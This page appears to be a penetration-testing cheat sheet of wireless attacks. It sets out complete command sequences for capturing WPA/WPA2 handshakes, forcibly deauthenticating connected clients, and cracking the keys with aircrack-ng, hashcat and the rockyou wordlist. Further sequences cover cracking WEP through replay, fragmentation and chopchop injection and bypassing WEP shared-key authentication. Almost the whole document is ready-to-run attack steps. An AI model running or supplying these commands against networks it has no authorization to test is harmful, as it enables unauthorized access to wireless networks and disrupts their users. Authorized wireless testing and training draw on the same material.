Wireless Attacks

Oldie but a goodie

Last updated 4 years ago

Cracking WPA2

# put your network device into monitor mode
airmon-ng start wlan0

# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0

# start listening for the handshake on the target's channel (6 here)
airodump-ng -c 6 --bssid <BSSID> -w capture/ mon0

# optionally deauth a connected client to force a handshake
aireplay-ng -0 2 -a <BSSID> -c <CLIENT> mon0

########## crack password with aircrack-ng ##########

# download 134MB rockyou.txt dictionary file if needed
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

# crack w/ aircrack-ng (-a2 = WPA/WPA2-PSK)
aircrack-ng -a2 -b <BSSID> -w rockyou.txt capture/-01.cap

########## or crack password with naive-hashcat ##########

# convert cap to hccapx
cap2hccapx.bin capture/-01.cap capture/-01.hccapx

# crack with naive-hashcat
HASH_FILE=capture/-01.hccapx POT_FILE=capture/-01.pot HASH_TYPE=2500 ./naive-hashcat.sh

########## crack password with hashcat ##########
hashcat64.exe -m 2500 cap.hccapx rockyou.txt -r rules\<rule>

Cracking WEP with Open Authentication Clients

########## Cracking WEP With Clients (open authentication) ##########
# enter monitor mode on the AP's channel
airmon-ng start wlan0 <AP Channel>

# capture dump of target AP
airodump-ng -c <channel> --bssid <AP MAC> -w <file-name> wlan0

# fake auth attack on AP
aireplay-ng -1 0 -e <ESSID> -a <AP MAC> -h <wlan0 MAC> wlan0

# fake auth attack on picky AP (re-associate every 6000s, send keep-alives)
aireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a <AP MAC> -h <wlan0 MAC> wlan0

# deauth attack to get ARP packet of another client
aireplay-ng -0 1 -a <AP MAC> -c <Victim MAC> wlan0

# arp request replay attack
aireplay-ng -3 -b <AP MAC> -h <wlan0 MAC> wlan0

# deauth to speed up capture of IVs
aireplay-ng -0 1 -a <AP MAC> -c <Victim MAC> wlan0

# crack WEP Key from the airodump capture
aircrack-ng -0 <file-name>-01.cap

Cracking WEP Via Client

########## Cracking WEP Via Client ##########
# enter monitor mode on the AP's channel
airmon-ng start wlan0 <AP Channel>

# capture dump of target AP
airodump-ng -c <channel> --bssid <AP MAC> -w <file-name> wlan0

# associate your MAC with AP (fake auth attack)
aireplay-ng -1 0 -e <ESSID> -a <AP MAC> -h <Your MAC> wlan0

# interactive packet replay attack (broadcast destination, ToDS frames)
aireplay-ng -2 -b <AP MAC> -d FF:FF:FF:FF:FF:FF -t 1 wlan0

# refined interactive replay attack (FromDS frames, 68-86 byte packets)
aireplay-ng -2 -b <AP MAC> -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 wlan0

# replay the saved packets to collect weak IVs
aireplay-ng -2 -r <capture filename> wlan0

# crack WEP Key (PTW attack, 64-bit key)
aircrack-ng -0 -z -n 64 <file-name>-01.cap

Cracking Clientless WEP

########## Cracking WEP without Clients ##########
# enter monitor mode on the AP's channel
airmon-ng start wlan0 <AP Channel>

# capture dump of target AP
airodump-ng -c <channel> --bssid <AP MAC> -w <file-name> wlan0

# fake auth attack with association timing
aireplay-ng -1 6000 -e <ESSID> -a <AP MAC> -h <wlan0 MAC> wlan0

# Option 1: fragmentation attack until 150,000 bytes
aireplay-ng -5 -b <AP MAC> -h <wlan0 MAC> wlan0

# find an active IP in the network
tcpdump -s 0 -n -e -r replay_*.cap

# create arp request packet from the recovered keystream (.xor)
packetforge-ng -0 -a <AP MAC> -h <wlan0 MAC> -k <Dest IP/Local Broadcast IP> -l <Source IP> -y <xor file> -w <output file>

# inject crafted packet to receive IVs
aireplay-ng -2 -r <packetforge inject file> wlan0

# time to crack WEP Key
aircrack-ng -0 <capture file .cap>

# Option 2: KoreK ChopChop (tends to work when frag attack does not, but takes longer)
aireplay-ng -4 -b <AP MAC> -h <wlan0 MAC> wlan0

# find an active IP in the network
tcpdump -s 0 -n -e -r replay_*.cap

# create arp request packet
packetforge-ng -0 -a <AP MAC> -h <wlan0 MAC> -k <Dest IP/Local Broadcast IP> -l <Source IP found in KoreK attack> -y <xor file> -w <output file>

# inject crafted packet to receive IVs
aireplay-ng -2 -r <packetforge inject file> wlan0

# time to crack WEP Key
aircrack-ng -0 <capture file .cap>

Bypassing WEP PSK

########## Bypassing WEP Shared Key Authentication ########## 
#enter monitor mode
airmon-ng start wlan0 <channel>

#capture dump of target AP  
airodump-ng -c <channel> --bssid <AP MAC> -w <file-name> wlan0

#deauth a connected client
aireplay-ng -0 1 -a <AP MAC> -c <Victim MAC> wlan0

# shared key fake auth attack using the keystream (.xor) captured from the deauthed client
aireplay-ng -1 6000 -e <ESSID> -y <sharedkey .xor> -a <AP MAC> -h <wlan0 MAC> wlan0

#ARP request replay attack
aireplay-ng -3 -b <AP MAC> -h <wlan0 MAC> wlan0

#deauth a connected client
aireplay-ng -0 1 -a <AP MAC> -c <Victim MAC> wlan0

#time to crack WEP Key
aircrack-ng -0 <capture file .cap>

Cracking WPA PSK

########## crack WPA PSK ##########
# put your network device into monitor mode
airmon-ng start wlan0

# if channel needed
airmon-ng start wlan0 <channel number>

# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0

# start listening for the handshake on the target's channel (6 here)
airodump-ng -c 6 --bssid <AP MAC> -w capture mon0

# deauth a connected client to force a handshake
aireplay-ng -0 1 -a <AP MAC> -c <Victim MAC> mon0

# crack with aircrack-ng
aircrack-ng -w <wordlist> <WPA PSK capture .cap>